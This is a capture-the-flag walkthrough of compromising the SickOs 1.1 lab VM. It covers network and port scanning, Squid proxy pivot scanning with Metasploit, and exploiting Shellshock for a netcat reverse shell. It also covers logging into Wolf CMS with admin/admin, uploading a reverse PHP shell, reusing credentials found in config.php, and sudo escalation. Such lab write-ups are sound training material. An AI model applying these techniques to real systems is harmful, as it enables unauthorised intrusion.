“This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them.” – D4rk
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.130/24)
Target: Sick0s: 1.1 (10.1.1.149/24)
Vulnerability & Exploit
Squid Proxy misconfiguration
Wolf CMS 0.8.2 admin weak password
Sensitivie information disclosure
Local priv escape by misconfigured sudo list
Scanned the network to discover the target server [arp-scan]
Port scanned the target to discover running services and open ports [masscan && nmap]
Exploit misconfigured Squid proxy to discover more hidden ports [msfconsole with exploit: auxiliary/scanner/http/squid_pivot_scanning]
Web application scanned to dig more information about web service [nikto]
Brute fuzz to find hidden files and paths [wfuzz]
Login Wolf CMS 0.8.2 backend admin page with weak login credential admin / admin
Exploit shellcode or upload webshell through wolfcms admin to get a limited shell
Enumeration and exploit the misconfigured sudo list to get ROOT
All the tools used here can be found in Kali Linux
Using arp-scan as routine to detect the target’s IP address (10.1.1.149 in this case).
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:fd:d1:6b VMware, Inc.
10.1.1.149 00:0c:29:48:e9:66 VMware, Inc.
10.1.1.254 00:50:56:ea:f1:fb VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.603 seconds (98.35 hosts/sec). 4 responded
10.1.1.149 is our Target!
Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
root@kali:~# masscan -p1-65535 10.1.1.149/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-16 11:23:26 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]Discovered open port 22/tcp on 10.1.1.149
Discovered open port 3128/tcp on 10.1.1.149
There are 2 ports (22, 3128) detected by masscan, then I run nmap to do a deeper service scan.
# Nmap 6.49BETA5 scan initiated Wed Dec 16 06:25:04 2015 as: nmap -v -O -A -sV -p22,3128 -oN 10.1.1.149_nmap.txt 10.1.1.149Nmap scan report for 10.1.1.149
Host is up (0.0027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:
|1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)|2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)| http-open-proxy: Potentially OPEN proxy.
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:48:E9:66 (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.019 days (since Wed Dec 16 05:58:20 2015)Network Distance: 1 hop
... turncate ...
Based on the result, I noticed that OpenSSH 5.9p1 and Squid Proxy v3.1.19 are running on port 22 and 3128. By searching exist exploit online against the squid proxy, I found the following misconfiguration vulnerability in rapid7: Squid proxy port scanner, which can be used to do an internal network scan.
So I start msfconsole and loaded the exploit squid_pivot_scanning with the following optoins:
msf auxiliary(squid_pivot_scanning) > show options
Module options (auxiliary/scanner/http/squid_pivot_scanning):
Name Current Setting Required Description
---- --------------- -------- -----------
CANARY_IP 18.104.22.168 yes The IP to check if the proxy always answers positively; the IP should not respond.
MANUAL_CHECK true yes Stop the scan if server seems to answer positively to every request
PORTS 21,80,139,443,445,1433,1521,1723,3389,8080,9100 yes Ports to scan; must be TCP
Proxies no A proxy chain of format type:host:port[,type:host:port][...] RANGE 10.1.1.149 yes IPs to scan through Squid proxy
RHOSTS 10.1.1.149 yes The target address range or CIDR identifier
RPORT 3128 yes The target port
THREADS 200 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(squid_pivot_scanning) >
Run it and got the following result, TCP port 80 seems open:
msf auxiliary(squid_pivot_scanning) > run
[+][10.1.1.149] 10.1.1.149 is alive but 21 is CLOSED
[+][10.1.1.149] 10.1.1.149:80 seems OPEN
[+][10.1.1.149] 10.1.1.149 is alive but 139 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 445 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 1433 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 1521 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 1723 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 3389 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 8080 is CLOSED
[+][10.1.1.149] 10.1.1.149 is alive but 9100 is CLOSED
[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf auxiliary(squid_pivot_scanning) >
In order to the verify if port 80 is open, I start up firefox and set the proxy points to 10.1.1.149:3128 then access http://10.1.1.149/.
and yes, there is web service listening on target machine’s port 80.
Then I use nikto to scan common web vulnerabilities.
- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.149
+ Target Port: 80
+ GET Retrieved via header: 1.0 localhost (squid/3.1.19)+ GET Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ GET Uncommon header 'x-cache' found, with contents: MISS from localhost
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ GET Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015
+ GET Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ GET Uncommon header 'tcn' found, with contents: list
+ GET Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for'index' were found: index.php
+ GET Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true+ OSVDB-112004: GET /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6271).
+ OSVDB-112004: GET /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6278).
+ ZSMPGCHN Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3093: GET /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3233: GET /icons/README: Apache default file found.
From the result, a shellsock vulnerability was found in target server under the path /cgi-bin/status.
In the meanwhile, I also run wfuzz to brute force crack/scan the hidden files/directories on the target server.
root@kali:~/SickOs# wfuzz -c -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt --hc 404 -p 10.1.1.149:3128 http://10.1.1.149/FUZZ
* Wfuzz 2.0 - The Web Bruteforcer *
Payload type: file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Total requests: 87664==================================================================ID Response Lines Word Chars Request==================================================================00001: C=2003 L 3 W 21 Ch " - # Copyright 2007 James Fisher"00002: C=2003 L 3 W 21 Ch "sit http://creativecommons.org/licenses/by-sa/3.0/"00003: C=2003 L 3 W 21 Ch " - #"00004: C=2003 L 3 W 21 Ch "ered case sensative list, where entries were found"00005: C=2003 L 3 W 21 Ch " - #"00006: C=2003 L 3 W 21 Ch "on-Share Alike 3.0 License. To view a copy of this"00007: C=2003 L 3 W 21 Ch " - #"00008: C=2003 L 3 W 21 Ch " - "00009: C=2003 L 3 W 21 Ch " - # on atleast 3 different hosts"00011: C=2003 L 3 W 21 Ch " - #"00014: C=2003 L 3 W 21 Ch "# This work is licensed under the Creative Commons"00015: C=2003 L 3 W 21 Ch "d a letter to Creative Commons, 171 Second Street,"00016: C=2003 L 3 W 21 Ch " - # directory-list-2.3-small.txt"00010: C=2003 L 3 W 21 Ch " Suite 300, San Francisco, California, 94105, USA."00294: C=2003 L 3 W 21 Ch " - index"01601: C=2004 L 17 W 109 Ch " - connect"01770: C=2003 L 6 W 45 Ch " - robots"Stopping...
Here I found three hidden files, after checked them one by one, I noticed that there is another hidden path /wolfcms found in file http://10.1.1.149/robots.
[note!!] From now on, there are two attacking vectors against the target server, one is to exploit shellshock vulnerability found previously in http://10.1.1.149/cgi-bin/status and the other one is to find and exploit vulnerability in the CMS system: wolfcms.
It works!, the file /etc/passwd can be read and I also noticed that there is an user called sickos which would be used to privilege escaping later. shellshock vulnerability has been confirmed and can be exploited.
So then, I setup nc to listen on local port 4444 and exploit shellshock to get a connection back.
Bingo! Now we have got a limited remote shell connect back to my tcp port 4444 which is listened by nc.
0x01 Analyze and exploit Wolf CMS 0.8.2
By searching online about wolfcms, learn it to know that it has login page: http://10.1.1.149/wolfcms/?/admin/login
After tried several weak passwords, I managed to login successful with the weak login credential: admin / admin
Under the file_manager, I can upload php shell to target server. In this case I uploaded a reverse php shell (rsh.php) which will connected back to my Kali’s port 5555.
Then I have to change the file attributes to 0777.
From what I learnt online, the uploaded php shell can be found in /public/ folder, so I set up nc again to listen on port 5555 and visit this URL http://10.1.1.149/wolfcms/public/rsh.php to trigger the reverse shell.
Now I get in~
It’s time to ROOT!
After enumeration on the file system, I found a configuration file which including sensitive information / login credentials, the file location is /var/www/wolfcms/config.php.
www-data@SickOs:/usr/lib/cgi-bin$ head -n 15 /var/www/wolfcms/config.php
head -n 15 /var/www/wolfcms/config.php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');define('DB_USER', 'root');define('DB_PASS', 'john@123');define('TABLE_PREFIX', '');// Should Wolf produce PHP error messages for debugging?
By checking the configuration file, I found DB user is root and password is john@123. I try to login SSH as user root with the compromised key john@123 but failed. Then I try to SSH login as user sickos.
root@kali:~# ssh email@example.com
firstname.lastname@example.org's password: Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Wed Dec 16 18:37:11 IST 2015 System load: 0.0 Processes: 115 Usage of /: 4.3% of 28.42GB Users logged in: 0 Memory usage: 12% IP address for eth0: 10.1.1.149 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/124 packages can be updated.92 updates are security updates.New release '14.04.3 LTS' available.Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Dec 15 18:12:43 2015 from 10.1.1.130
Got in! Then I did enumeration over the target machine and found user sickos is able to use sudo command to run any commands as root privilege.